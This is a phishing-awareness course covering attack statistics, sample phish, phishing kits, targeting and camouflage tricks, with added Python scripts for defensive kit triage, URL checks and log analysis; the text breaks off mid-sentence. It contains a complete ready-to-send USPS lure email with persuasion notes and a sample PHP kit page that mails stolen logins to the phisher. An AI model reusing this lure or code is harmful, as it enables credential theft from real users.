How To Catch a Phish: User Awareness and Training
This online continuing education course is available
through a professional courtesy provided by:
Malcovery Security, LLC
2400 Oxford Drive #302
Bethel Park, PA 15102
Phone: 855-625-2683
Email: sales@malcovery.com
Twitter: @malcovery
Facebook: Malcovery
LinkedIn: Malcovery
Google+: Malcovery
© Concise Courses USA. The material contained in this course was researched, assembled, and produced by Concise Courses USA and remains their property. Questions or concerns about the content of this course should be directed to the program instructor.
Section 1: The Threat
Course written by Jeremy Faircloth (CISSP, Security+, CCNA, MCSE, MCP+I, A+)
A Quick Overview of the Problem!
1. While phishing is an “old-fashioned” cyber security threat, attacks continue to increase.
Corporations and their customers are continuing to experience phishing and malicious spam attacks. In fact, it’s happening more than ever before: 37.3 million users experienced phishing attacks in 2013, an increase of over 87% in one year.
2. The stakes are high for cybercrime victims.
Banking/financial institutions, commerce organizations, universities, etc. are frequent victims of cyber attacks, which are a form of cybercrime. Remediation costs and long-term loss of brand loyalty hurt the company’s bottom line. It is estimated that one of every 200 phishing attacks is successful. The average cost of a phishing attack to the organization is upwards of $150,000. Those are significant costs (more on that in the next slide).
3. Traditional methods simply aren’t working.
Despite multiple layers of cybercrime defense and prevention (end user education and training about phishing and spam, web filters, web gateway blacklists, take-down vendors), corporations and organizations continue to experience significant losses to malware, phishing, and other forms of cybercrime.
The reason?
Victims of phishing and malware have not been able to identify who the criminals are, or the scope of the damages they cause.
Cyber Attack Costs: Reputation
The Cisco report breaks the cost of a successful attack into three tiers:
1. Financial (direct losses)
2. Remediation
3. Reputation
For every $1 in direct losses there are $2.10 in remediation costs and $6.40 in reputation costs.
“Customers are 42% less likely to do business with you if they are aware of phishing attacks against your brand.”
Source: Cisco report, “Email Attacks: This Time It’s Personal”
New “CyberRisk in Banking” study
www.businesswire.com/news/Banks-Lack-Ammo-Fight-Cyberthreats-Report
According to 2013 research by American Banker, banking executives rated phishing as “very likely” to occur and as having a “high impact” on their organization.
Phishing Attacks, by the numbers!
APWG Global Phishing Survey 1H2013:
The average uptime of a phishing site? 44 hours 39 minutes
The number of targeted brands? 720 brands
“37.3 million users experienced phishing attacks last year, an increase of 87%” (Kaspersky Lab, June 2013)
Phishing Attacks, by the numbers!
In the second half of 2012:
6.8% of all sent email was malware distribution
4.9% of all sent email was phishing distribution
(Microsoft Security Intelligence Report v.14)
There was consensus among 250 senior banking executives that phishing lacked ‘awareness’, according to 2013 research by American Banker.
Section 2: Phishing Examples
Example 1: GoDaddy!
This was a somewhat targeted attack. The criminals wanted to plant malware on the computers of known webmasters, so they sent this email in which each recipient saw that his own domain was going to be terminated.
This is alarming for many people, since no one wants downtime on their site. The scam then persuades the user to enter details, which are emailed back to the attackers.
Example 2: Bank of Montreal
Sometimes you just can’t tell sites apart...spot the difference (if you can!)
Example 3: Canadian Imperial Bank of Commerce
Sometimes you just can’t tell sites apart...spot the difference (if you can!)
Example 4: Royal Bank of Canada
Here’s a great phishing attack for all the wrong reasons – this Royal Bank of Canada fake page is asking for users to re-activate their
account ‘due to security’ concerns.
To the unsuspecting, this seems very convincing.
Example 5: HSBC Bank
A good phishing attack will look identical to the real site (most criminals use ‘phishing kits’...more on that later).
Example 6: American Express
This is a very recent phishing attack that was picked up by the Malcovery Cyber Intelligence & Forensics System. This was a well-thought-out phishing campaign and process.
Step 1 of 6
The subject line of the email was “Fraud Alert: Irregular Card Activity”.
The ‘From’ address was “American Express (fraud@aexp.com)”.
The highlighted link that claims it will take you to https://www.americanexpress.com/ actually goes to one of 419 URLs on one of 57 compromised web servers.
Each of the index.html pages that the victim was sent to was actually a redirector script that displayed a box saying “Connecting to server” while it tried to load one of three JavaScript files from three different locations.
Step 2 of 6
Soon afterwards the victim was asked for their user ID and password.
Step 3 of 6
Then their Social Security number, birthdate, mother’s maiden name, her birthdate, and a PIN.
Step 4 of 6
And then of course - the card number...
Step 5 of 6
And the expiration date...
Step 6 of 6
And finally the visitor is allocated 5,000 Reward points as a ‘thank-you’ and forwarded to the actual AmEx page.
According to the Malcovery research, to gather the user IDs and passwords of a few hundred American Express card holders, the phisher was willing and able to break into SEVENTY web servers: 57 used in the spam, 10 more for the JavaScript redirection scripts, and 3 for the actual phishing hosts.
Quite an elaborate scheme, and impressive for all the wrong reasons.
In Summary
So, in summary, the information gathered during a phishing attempt can vary greatly.
Depending on the focus of the attack, the phisher could be looking for account credentials, financial information, sensitive corporate information, or even confidential personal information. Phishing attacks for all of these types of information have been seen “in the wild” and are used to collect information that the attacker would not otherwise have access to.
This information is then used for a variety of purposes. Personal information from individuals including credit card data or banking details can be used to commit fraud. An attacker can steal a person’s identity or impersonate them using confidential information such as social security numbers, birth dates, and answers to questions that could normally be used to authenticate a person’s identity such as their mother’s maiden name. On a more nefarious front, information gathered during phishing attempts can be used as part of a larger attack attempt and can be leveraged to further penetrate through a company’s technology-based defenses.
In short, phishing is an attempt to gather data that the phisher is not authorized to have. This data can then be used for many illicit purposes.
Section 3: Phishing Methodologies
In this section we will be discussing some of the basics associated with phishing to better understand what phishing is, why phishing is performed, and what the attacker can gain by phishing.
Next, we’ll identify some of the targets that can be associated with phishing and how the attacker approaches those targets.
Phishing techniques will be demonstrated and you’ll see first-hand how easy it is to effectively perform a phishing attack. Our final section will focus on what you can do about this problem and some techniques that can be used to combat phishing.
Benefits to the Phisher
So why would an attacker use phishing rather than other attack techniques?
To start with, phishing is very easy. Much like traditional fishing with a rod, reel, and hook, phishing attacks can be done with very little effort. All the phisher has to do is plan out his phishing trip, put together some good bait and all of his gear, and then see if any phish are biting. This isn’t even an expensive guided phishing trip with top of the line gear and boats! Most phishing techniques are performed at a very low cost by using basic techniques, low-cost technologies, and a little practice. While some traditional attack techniques can be very expensive to perform, phishing is considered a low-cost, high-return investment.
Many phishing techniques are based on using disposable email addresses, servers, and domain names. Due to this, the perpetrator of the attack can hide their identity very effectively. Attempting to gather forensic information about phishing attacks tends to lead investigators down rabbit holes where the actual attacker is practically impossible to identify. At most, the characteristics of the attack can be determined and the disposable addresses and other information associated with the attack can be gathered for a level of future prevention.
Phishing is also very difficult for end-users to detect. With advanced phishing techniques, the messages used or sites shown as part of the attack can look very real. In addition, other attacks or techniques can be used to make the phishing attack even more transparent by leveraging real information. We’ll talk about this a little further when we discuss phishing techniques.
The worst part about phishing from the perspective of those trying to prevent it is its sheer effectiveness. Phishing simply works. Many security practitioners talk about creating layered security approaches or defense-in-depth, and these techniques can help combat traditional attacks very well. However, you can never underestimate the risk that people present to their own information or others’. The most vulnerable part of any organization tends to be its people, and they are the true target of phishing attacks.
So what does all of this add up to for the attacker? In business terms, phishing is an excellent value proposition! With low cost, minimal risk, and high returns, few attack techniques offer the same value to attackers. Consequently, phishing tends to be a favorite technique for many attackers.
Why is phishing so easy?
•	 Phishing kits are easily and readily available
•	 Domain registration takes seconds
•	 Many sites are easy to exploit
•	 Every takedown is another opportunity
Phishers create tools and use methods that make it as easy on themselves as possible. Phishing kits exist that are so complete
that all the phisher has to do is set their email address and upload the kit to a new or compromised site.
For new domains, a phisher can register a domain privately in seconds. In fact, these registrations are usually free for the phisher as
they take advantage of the return policies of domain registrars. One notable registrar allows for the return of a domain name if you
change your mind within three days of registering it. Three days is more than enough for a phisher.
Aside from newly registered domains, phishers frequently use existing sites that have been compromised. This allows them to use
the positive reputation rating for the site and simply install their phishing kit somewhere within the site structure. For example, if
WordPress is used, phishers will frequently hide their kit somewhere in the /wp-admin/ directory of the site.
Generally, part of the phishing defense process is to notify the owner of a site that their site has been compromised and is being
used for phishing. However, if the phisher is actually the owner of the site, you’re just telling them that they need to use another
domain now. Effectively, the defense process tells the phisher when they need to change their attack!
Phishing Kits
•	 Easy to configure
•	 Easy to deploy
•	 Very effective...Usually
Phishing kits help make this type of attack incredibly easy for phishers. They are like being handed a fully stocked tackle box and a fishing pole with a baited hook already on the line. But what do they look like?
Here is one example of the file contents of a phishing kit. If you look at the file dates, you’ll see that a lot of these files are older with minor modifications over time. However, the confirm.php file is fairly recent and is newer than any of the other files in the kit. That implies that there is configurable data in that file that needs to be changed when the kit is deployed.
confirm.php
A lot of this file is PHP code associated with the phishing confirmation page, but if you look at the section in bold, there is an encoded email address in here too. This is probably the portion that gets changed prior to the upload of the kit.
Since it’s a base64 encoded value, we can quickly decode this and obtain the email address of the phisher:
$emailusr1 = base64_decode('c29mb3RleDJAZ21haWwuY29t');
Which decodes to: sofotex2@gmail.com
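The two observations above (the newest file in a kit is where the operator’s per-deployment settings live, and the drop address is usually only base64-obfuscated) can be automated when triaging a seized kit. The following Python script is an added example written for this edit; it is not code from the course or from Malcovery. It assumes the kit arrives as a .zip (as uploaded kits usually do), lists its files newest-first, decodes every base64-looking string in the PHP files and keeps the ones that decode to an email address. The sample kit it builds is constructed for the demo and is not a real kit; only the base64 literal is the one shown on the slide.

```python
import base64
import io
import re
import zipfile

# PHP patterns: an explicit base64_decode('...') call, and any bare string
# literal that looks like base64 (some kits decode in a separate helper).
B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")
EMAIL = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

# Constructed stand-in for a kit's confirm.php: invented PHP around the
# base64 literal shown in the course.
SAMPLE_CONFIRM_PHP = r"""<?php
$ip = $_SERVER['REMOTE_ADDR'];
$emailusr1 = base64_decode('c29mb3RleDJAZ21haWwuY29t');
$subject = "Login Info | " . $ip;
$message = "User: " . $_POST['user'] . "\nPass: " . $_POST['pass'] . "\n";
mail($emailusr1, $subject, $message, "From: $emailusr1");
header("Location: https://www.example-bank.test/");
?>"""


def decode_candidates(php_source):
    """Yield (encoded, decoded) pairs for every base64 string in the PHP that
    decodes strictly to UTF-8; anything that fails strict decoding is skipped."""
    seen = set()
    for pattern in (B64_CALL, B64_LITERAL):
        for match in pattern.finditer(php_source):
            encoded = match.group(1)
            if encoded in seen:
                continue
            seen.add(encoded)
            try:
                decoded = base64.b64decode(encoded, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue
            yield encoded, decoded


def hidden_addresses(php_source):
    """Sorted e-mail addresses hidden by base64 in one PHP file."""
    return sorted({d for _, d in decode_candidates(php_source) if EMAIL.match(d)})


def files_by_age(zip_bytes):
    """(name, YYYY-MM-DD) for every file in the kit, newest first."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        infos = [i for i in zf.infolist() if not i.is_dir()]
    infos.sort(key=lambda i: i.date_time, reverse=True)
    return [(i.filename, "%04d-%02d-%02d" % i.date_time[:3]) for i in infos]


def triage_kit(zip_bytes):
    """Newest file (the likely per-deployment config) plus every drop
    address found in any .php file of the kit."""
    addresses = set()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".php"):
                addresses.update(hidden_addresses(zf.read(info).decode("utf-8", "replace")))
    return {"newest": files_by_age(zip_bytes)[0][0], "drop_addresses": sorted(addresses)}


def build_sample_kit():
    """Constructed demo kit: old static pages plus a recently edited confirm.php."""
    files = {
        "index.html": ((2009, 3, 2, 0, 0, 0), "<html>fake login page</html>"),
        "style.css": ((2009, 3, 2, 0, 0, 0), "body { font-family: sans-serif; }"),
        "login.php": ((2010, 8, 9, 0, 0, 0), "<?php header('Location: confirm.php'); ?>"),
        "confirm.php": ((2011, 2, 15, 0, 0, 0), SAMPLE_CONFIRM_PHP),
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, (stamp, body) in files.items():
            zf.writestr(zipfile.ZipInfo(name, date_time=stamp), body)
    return buf.getvalue()


if __name__ == "__main__":
    kit = build_sample_kit()
    for name, day in files_by_age(kit):
        print(day, name)
    print(triage_kit(kit))
```

The strict `validate=True` decode matters: kits are full of long alphanumeric strings (tokens, hashes, session IDs) that look like base64 but are not, and a lenient decoder would turn them into binary noise that the email regex then has to sift through.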
sofotex2@gmail.com
If we search the Malcovery PhishIQ database, we find that sofotex2@gmail.com was first seen on February 15, 2011 in a Bank of Montreal kit!
The platform tells us that this individual (or group) used this URL: http://conneelybuilders.net/bmo-canada-online/online-cgi-data/
What does a Phisher (typically) Catch?
•	 Credentials
•	 Account Numbers
•	 Personal Information
•	 Technical Information
•	 Financial Information
•	 Compromised Systems
With phishing being so easy, what does the phisher usually catch?
Phishing kits and sites gather credentials, account numbers, personal information such as a mother’s maiden name, technical information about the target such as their browser information which can be used to fool device identification processes, financial information, and finally, the compromise of systems.
With data like this, the phisher can perform identity theft and impersonate the individual who has been phished. They could open new lines of credit, access existing financial accounts, and even access their email.
This allows the attacker to send phishing emails to other people that the target knows from their own account, access any passwords for web sites that the target has stored in their email account, and hide notifications from the target’s bank or other sites by deleting the messages before the target sees them.
Section 4: Phishing Targets
Choosing Targets
Broad Targets
- Randomly Generated Email Addresses
- Gathered Email Address Databases
- Verified Email Addresses
Focused Targets
- Company’s Employees
- Company’s Customers
- Geographical Locations
Laser-Focused Targets
- Company Officers
- Specific Individuals
- Highly Selective Criteria
Phishers can use a range of methods for targeting their phish. For email-based phishing attacks, the phishers can use broad techniques to build out email lists that target thousands of individuals. This can be done using randomly generated email addresses, email addresses that have been gathered through various marketing sites, or through email harvesting. These broad targeting techniques hit thousands and thousands of email addresses daily.
Perhaps you’ve seen some of the examples on the next few pages?
Phishing Targets: Examples
Here’s an email from Federal Express. You have
a package coming to you, don’t you?
Perhaps you’d like to get in touch with
some old colleagues through LinkedIn?
And who hasn’t placed an order with Amazon?
All of these examples are real phishing attacks that are sent to broad targets.
Phishing Targets: Examples continued
In some cases, the phisher is more focused. They will target employees of a specific company or customers of that company. In other cases, they’ll target a specific geography. Focused targeting like this is known as ‘spear-phishing’; when the targets are senior executives (the company officers in the laser-focused tier above) it is called ‘whaling’.
An example of this would be sending emails to all addresses known to be within a certain area that is served by a specific utility provider. The phisher would send an email purporting to be from that provider to a demographic that is more likely to fall for the attack. It’s like marketing for bad guys.
Example lures: “Calling all Verizon customers!” and “My Citi credit card statement doesn’t look right… Let me click on that to find out what’s wrong.”
Camouflage
• Falsified Sources (Email Domains, Compromised Web Servers)
• Reasonable/Similar Domain Names
• Long URLs
• DNS Hijacking
Most phishers use camouflage to hide from detection and to keep from being identified. To do this, a variety of techniques are employed, including falsifying the source of the email and using compromised web servers. Compromised web servers aren’t just used to host the phishing kit. They can also be used to send out the phishing emails. This allows the email to come from a domain that is valid and may have a good reputation rather than setting off alarms by coming from a recently registered or unusual domain. Here’s a tip… If you’re running a web server and you don’t send out emails from the site, remove any email functions from the host (on a PHP site, for example, add mail to disable_functions in php.ini, and if nothing on the host needs to send mail, uninstall the local mail transfer agent).
Many times, a phisher will use a domain name that is either reasonable or similar to the real site of the phishing victim. For example, “myaccountbenefits.com” or “bankofamerica-accountsecurity” seem like reasonable domain names but could be used for phishing. How about adding an extra character as in “welllsfargo.com” using three “L’s”? Internationalized domain names can contain non-ASCII characters (carried in DNS as Punycode, an “xn--” label), so adding an accented or look-alike vowel can also camouflage a phishing site.
Long URLs!
Really long URLs are a favorite for phishers. Consider the URL shown below.
If, as a normal user, you have a slight degree of heightened awareness, you might take a look at the URL to ensure that it’s what you’re expecting. At first glance, it looks like a PayPal URL with some normal passing of variable data. What most users won’t see is that the actual domain name (cediapvenezuela.com) is all the way in the middle of this long string; everything in front of it is just a chain of subdomain labels the attacker controls.
While the normal advice that security practitioners give is for the user to hover over the URL and see what domain pops up, this isn’t nearly as easy on mobile devices or tablets. Using a long URL like this is incredibly effective for phishing.
The last camouflage technique that we’ll talk about is DNS hijacking. This has been seen in a few different types of attacks recently and can be very effective.
Two primary methods of performing DNS hijacking are to modify the target’s DNS settings in some way or to modify the DNS settings for a target site with their domain registrar directly.
The first method is usually performed using some form of malware or remote access to the target system. The second is more effective with standard phishing attacks and makes use of vulnerabilities in the verification systems of domain registrars or compromised administrators’ systems.
For example, if a phisher manages to get malware on a site administrator’s system, they could obtain credentials for the domain registrar, modify the DNS settings for the site’s domain, and use DNS hijacking to forward any requests to the site over to their phishing page.
http://paypal.com.ogi-bin.webscr.cmd-flowers.chmod-login.30934836349034713461359135135webapps8mmp6r7r1paypal.cediapvenezuela.com/websc/update.php?cmd=_loginsubmit&dispatch=93750148177318734n31nd7as6asbasba7743434ndasd6556sad5as=03418asd6asd6asdhasd5
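The checks a user is told to do by eye (find the real domain in a long URL, notice the extra “l” in welllsfargo, spot a look-alike vowel) can be done mechanically on every link in an inbound message. The following Python script is an added example written for this edit, not code from the course or from Malcovery, and it covers both the look-alike domain names from the Camouflage slide and the long-URL trick above. It assumes a small constructed brand list, a naive “last two labels” definition of the registrable domain (good enough here; multi-part public suffixes such as .co.uk need the Public Suffix List), and an edit-distance threshold of two; the test URLs other than the PayPal one from the slide are the course’s own examples.

```python
from urllib.parse import urlsplit

# Constructed brand list for the demo; use your own brands in practice.
BRANDS = ["paypal", "wellsfargo", "bankofamerica", "amex", "usps"]

# The long PayPal-themed URL from the course, reassembled from the slide.
LONG_URL = (
    "http://paypal.com.ogi-bin.webscr.cmd-flowers.chmod-login."
    "30934836349034713461359135135webapps8mmp6r7r1paypal.cediapvenezuela.com"
    "/websc/update.php?cmd=_loginsubmit&dispatch=93750148177318734n31nd7as6asbasba"
    "7743434ndasd6556sad5as=03418asd6asd6asdhasd5"
)


def registrable_domain(url):
    """Last two labels of the host: the part the browser really connects to,
    however many 'paypal.com' labels sit in front of it.  Naive on purpose:
    multi-part public suffixes such as .co.uk need the Public Suffix List."""
    host = (urlsplit(url).hostname or "").rstrip(".")
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def levenshtein(a, b):
    """Edit distance; one extra, missing or swapped character is distance 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_url(url, brands=BRANDS):
    """Camouflage indicators found in a URL (an empty list means none)."""
    host = (urlsplit(url).hostname or "").lower()
    reg = registrable_domain(url)
    sld = reg.split(".")[0]          # second-level label, e.g. 'welllsfargo'
    findings = []
    # Non-ASCII or already-Punycode label: an IDN homoglyph candidate.
    if not host.isascii() or any(label.startswith("xn--") for label in host.split(".")):
        findings.append("idn-label")
    for brand in brands:
        if sld == brand:
            continue                  # the genuine domain
        distance = levenshtein(sld, brand)
        if 0 < distance <= 2:
            findings.append("lookalike:" + brand)            # welllsfargo
        elif brand in host and brand not in reg:
            findings.append("brand-outside-registrable-domain:" + brand)  # paypal.com.x.evil.com
        elif brand in sld:
            findings.append("brand-embedded:" + brand)       # bankofamerica-accountsecurity
    if len(host) > 60:
        findings.append("long-host")
    return findings


if __name__ == "__main__":
    for u in (LONG_URL, "https://www.paypal.com/signin", "http://welllsfargo.com/",
              "http://bankofamerica-accountsecurity.com/", "http://p\u0430ypal.com/login"):
        print(registrable_domain(u), classify_url(u))
```

The last sample URL spells “paypal” with a Cyrillic “а” (U+0430); it is flagged twice, once for the non-ASCII label and once because its ASCII-looking second-level label is one edit away from the brand. Feed the function every href in a message rather than the visible link text, since the two need not agree.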
The Victims...
•	 Financial Impact
•	 Fraud Loss
•	 Remediation Costs
•	 Reputation Impact
•	 Loss of Business
•	 Loss of Credibility
As a victim, there are obviously a number of impacts to the targeted organization.
In the financial arena, it’s pretty common to consider the costs associated with loss due to fraud
and the cost to remediate issues. For example, the company that has been phished may have to
pay for identity theft protection for customers who fell victim to the phishing attempts.
There is also a substantial loss to a company’s reputation when they’re phished. This can
lead to a loss of business further impacting the financial outlook for the company as well as a
loss of credibility. Let’s look at some numbers associated with this.
As discussed earlier, based on a recent report from Cisco, the costs for a successful phishing
attack break down into categories of direct financial impact, remediation costs, and reputation
costs.
This forms a pyramid with costs associated as shown in this slide. So as you look at impacts, per
the Cisco report, every dollar of direct financial impact (1 on the chart) values out at $9.50 in
total costs when taking into account remediation (2) and the impact to reputation (3).
The Victims...an example: South Carolina Government Agency
Customers are less likely to do business with a company if they have heard about phishing attacks against that company. Let’s take a look at an example from a different angle.
In 2012, a breach occurred in a South Carolina government agency. The timeline of the breach is shown below.
From a financial perspective, look at the final line. All other considerations aside, just paying for the identity theft protection for affected individuals has cost over 12 million dollars so far. This is from a single phishing attack.
• August 13, 2012: Department of Revenue employee opens a phishing email.
• August 27, 2012: Hacker logs in via Citrix VPN using the phishing victim’s credentials.
• August 29, 2012: Hacker runs utilities to steal passwords from six servers.
• September 2-4, 2012: Hacker runs reconnaissance on 21 servers.
• September 12, 2012: Hacker dumps data to a staging directory.
• September 13-14, 2012: 74.7 Gigabytes of data exfiltrated by hackers.
• October 10, 2012: State learns of the breach from the US Secret Service.
• October 26, 2012: Breach disclosed to the public.
So far, 1 million residents have signed up for credit monitoring at a cost of $12 million to the state.
Section 5: Performing Phishing Attacks
Tossing Bait
•	 Used to target large groups of individuals
•	 Requires simple email address harvesting or generation
•	 Uses many emails with the hope that a small percentage will
yield positive results
For this demonstration, we’ll use the “tossing bait” technique. Basically, a large number of email addresses are gathered and we’ll send a phishing email out to all of them.
The goal here is to hit as many people as possible and rely on the large number of emails sent to compensate for the relatively low success rate on a percentage basis.
Tossing Bait Demonstration
1. Target: Verified Email Addresses
2. Bait: Package Delivery
3. Cast: Email with Web Site Link
For our phishing campaign, we’ll set it up to use verified email addresses as a target destination. For bait, why not tell our phish that we have a package for them? And we’ll cast this out with a link to a website where we can harvest their information.
Tossing Bait Email
Dear Customer,
We attempted to deliver your item at 10:16 am on October 24, 2012 and a notice was left. You may arrange redelivery by clicking the link below or pick up the item at the Post Office indicated on the notice.
If this item is unclaimed after 15 days then it will be returned to the sender. The sender has requested that you receive a Track & Confirm update, as shown below.
Label Number: 7007 3795 0147 6588 4478
Expected Delivery Date: October 24, 2012
Service Type: First-Class
Certified Mail Service(s): Delivery
Confirmation Status: Final Notice
To check the status of your mailing or arrange redelivery, please visit http://www.usps.com.usg3o1.com/shipping/trackandconfirm.php?navigation=1&respLang=Eng&resp=10242012
Regards!
Here’s the email that we’ll use. We’ll include a date so that it seems relevant. We’ll design in a sense of urgency by indicating that there are only 15 days to respond, and we’ll add some other details such as a label number to make this appear legitimate. Note that the link’s real domain is usg3o1.com; “www.usps.com” is just a subdomain of it.
There are actually a lot of psychological elements that go into the design of a good phishing email. By appealing to some of the base instincts of people, such as developing a sense of urgency, appearing to give them something that they want, and making them believe the legitimacy of something that they want to believe, the success rate of phishing attempts increases.
Tossing Bait Results
Of the 9,116 visitors who actually downloaded malware from the malicious URL, those who were using webmail clients left “referrer” tags:
• 764 Yahoo webmail users
• 275 Live.com (Microsoft) webmail users
• 174 AOL webmail users
• 36 Comcast, 19 Verizon, 14 Earthlink, 12 Roadrunner, 6 Charter, 4 Juno
Who was infected with the malware?
• 10 U.S. Federal and many State government agencies
• 231 Canadian IP addresses (though 132 were RIM/BlackBerry)
• 59 different Universities and Colleges
• 9 banks (up to 19 IPs!) and 3 brokerages (one had 10 IPs!)
• Energy companies (one had 17 downloads!)
• Airlines, Beverage companies, Chemical companies, Cruise lines, Defense Contractors, Hospitals, Newspapers, Professional sports teams, Publishers, Retail department stores, Silicon Valley companies, Theme parks
• 7,000+ users from 59 major ISPs; 14 of those ISPs had between 100 and 973 users infected
For this particular attack, we can get a pretty good idea of what the results will be. Why? Because this was an actual attack performed in 2012 that impersonated the United States Postal Service. A very thorough analysis of the web server host used for this revealed the web server logs, and the data on this slide was derived from them.
This data is very telling… Many of the systems that downloaded the malware weren’t able to detect it even though it was Zeus, a commonly used malware kit. Many of these organizations also have URL filters to help prevent phishing, but this URL was not blocked. The email providers didn’t help either, as they did not detect this as spam. Overall, a very effective campaign.
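The per-provider figures above come from reading the Referer header that webmail sessions attach to the click, and the victim counts from the client IPs that actually fetched the payload. The following Python script is an added example written for this edit; it is not the Malcovery analysis and the log excerpt is constructed (RFC 5737 test addresses, a hypothetical lure path borrowed from the demo email), not the campaign’s real log. It assumes the Apache/nginx “combined” log format and counts only 2xx responses, so clicks that arrived after the kit was taken down (404) are not mistaken for infections.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Apache/nginx "combined" format:
# ip ident user [time] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Referer host fragments that identify webmail providers (constructed list
# covering providers named on the slide; extend as needed).
WEBMAIL = {
    "mail.yahoo.com": "Yahoo",
    "mail.live.com": "Live.com",
    "mail.aol.com": "AOL",
    "comcast.net": "Comcast",
    "verizon.net": "Verizon",
    "earthlink.net": "Earthlink",
}

LURE_PATH = "/shipping/trackandconfirm.php"   # path the lure e-mail linked to

# Constructed log excerpt; not the real campaign's log.
SAMPLE_LOG = """\
198.51.100.7 - - [24/Oct/2012:10:16:01 -0400] "GET /shipping/trackandconfirm.php?navigation=1&resp=10242012 HTTP/1.1" 200 61440 "http://us-mg5.mail.yahoo.com/neo/launch" "Mozilla/5.0 (Windows NT 6.1)"
198.51.100.7 - - [24/Oct/2012:10:16:02 -0400] "GET /shipping/trackandconfirm.php?navigation=1&resp=10242012 HTTP/1.1" 200 61440 "http://us-mg5.mail.yahoo.com/neo/launch" "Mozilla/5.0 (Windows NT 6.1)"
203.0.113.22 - - [24/Oct/2012:10:17:45 -0400] "GET /shipping/trackandconfirm.php?navigation=1&resp=10242012 HTTP/1.1" 200 61440 "https://bay170.mail.live.com/default.aspx" "Mozilla/5.0 (Windows NT 5.1)"
203.0.113.40 - - [24/Oct/2012:10:18:10 -0400] "GET /shipping/trackandconfirm.php?navigation=1&resp=10242012 HTTP/1.1" 200 61440 "-" "Mozilla/5.0 (Windows NT 6.1)"
192.0.2.9 - - [24/Oct/2012:10:19:30 -0400] "GET /shipping/trackandconfirm.php?navigation=1&resp=10242012 HTTP/1.1" 200 61440 "http://webmail.aol.com/38132/aol/en-us/Suite.aspx" "Mozilla/5.0 (Macintosh)"
192.0.2.30 - - [24/Oct/2012:10:20:05 -0400] "GET /shipping/trackandconfirm.php?navigation=1&resp=10242012 HTTP/1.1" 404 213 "http://us-mg5.mail.yahoo.com/neo/launch" "Mozilla/5.0 (Windows NT 6.1)"
192.0.2.15 - - [24/Oct/2012:10:20:40 -0400] "GET /favicon.ico HTTP/1.1" 200 318 "-" "Mozilla/5.0 (Windows NT 6.1)"
"""


def parse_log(text):
    """Parsed records for every line that matches the combined format."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def webmail_provider(referer):
    """Provider name if the Referer came from a known webmail host, else None."""
    if referer in ("", "-"):
        return None
    host = (urlsplit(referer).hostname or "").lower()
    for fragment, name in WEBMAIL.items():
        if fragment in host:
            return name
    return None


def summarize_downloads(log_text, lure_path=LURE_PATH):
    """Unique victim IPs that successfully fetched the lure, overall and per
    webmail provider.  Repeat clicks from one IP count once; a 404 means the
    file was already gone when that victim clicked, so it is not counted."""
    victims = set()
    by_provider = defaultdict(set)
    for rec in parse_log(log_text):
        if rec["method"] != "GET" or not rec["status"].startswith("2"):
            continue
        if urlsplit(rec["path"]).path != lure_path:
            continue
        victims.add(rec["ip"])
        provider = webmail_provider(rec["referer"])
        if provider:
            by_provider[provider].add(rec["ip"])
    return {
        "victims": len(victims),
        "by_provider": {p: len(ips) for p, ips in sorted(by_provider.items())},
    }


if __name__ == "__main__":
    print(summarize_downloads(SAMPLE_LOG))
```

Desktop mail clients send no Referer, which is why the provider breakdown on the slide is only a subset of the 9,116 downloads; the victim total is taken from the IPs, not from the referrers. Attributing IPs to organizations (the banks, agencies and universities listed above) is a separate step done with WHOIS or reverse DNS on the unique-IP list.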
There are Plenty of Phish in the Sea!
The average uptime of a phishing site? 44 hours 39 minutes
The number of targeted brands? 720 brands
(APWG Global Phishing Survey 1H2013)
37.3 million users experienced phishing attacks last year, “an increase of 87%” (Kaspersky Lab, June 2013)
In the second half of 2012:
• 6.8% of sent email was malware distribution
• 4.9% of sent email was phishing distribution
(Source: Microsoft Security Intelligence Report v.14)
We have already seen these stats, but just as a reminder, look at the figures...
Seeing the research from APWG, Kaspersky Lab and Microsoft, we can see that phishing is prolific, increasing in frequency, and obviously still very effective. Current defenses aren’t working well enough and this problem is not going away.
When a phishing site is only up for less than two days, how do you react fast enough to block the URL? With the number of brands targeted, how do you protect yours? With the number of users attacked increasing and the sheer volume of phishing and malware emails being sent, how do you keep users safe?
Section 6: Preventions + Solutions
Simple things...
Let’s start with the simple stuff to tell our staff members and colleagues, i.e. the DIY basics. Ways to avoid phishing scams include, for example:
1. Guarding against email spam
2. If in doubt, communicate personal information only by phone or via secure web sites (look for HTTPS as a minimum, but remember that HTTPS only shows the connection is encrypted, not that the site is legitimate; phishing sites can use it too, so check the domain name as well)
3. Do not click on links, download files or open attachments in emails from unknown senders
4. Open attachments only when you are expecting them and know what they contain, even if you know the sender
5. Protect your computer with a firewall, spam filters, anti-virus and anti-spyware software. Do some research to ensure you are getting the most up-to-date software, and update it all regularly to ensure that you are blocking new viruses and spyware.
Client-side anti-phishing protection is another ‘norm’ when it comes to phishing defense. Many endpoint security suites include it, for example avast!, Avira, ESET Smart Security, McAfee etc.
What Doesn’t Work?
Phishing prevention using traditional techniques does not work
•	 Manual Blacklisting
•	 DNS Blocking
•	 Phisher Identification
We already know things that don’t work. Manual blacklisting of URLs is
too slow to be effective. DNS blocking has the same problem. Traditional
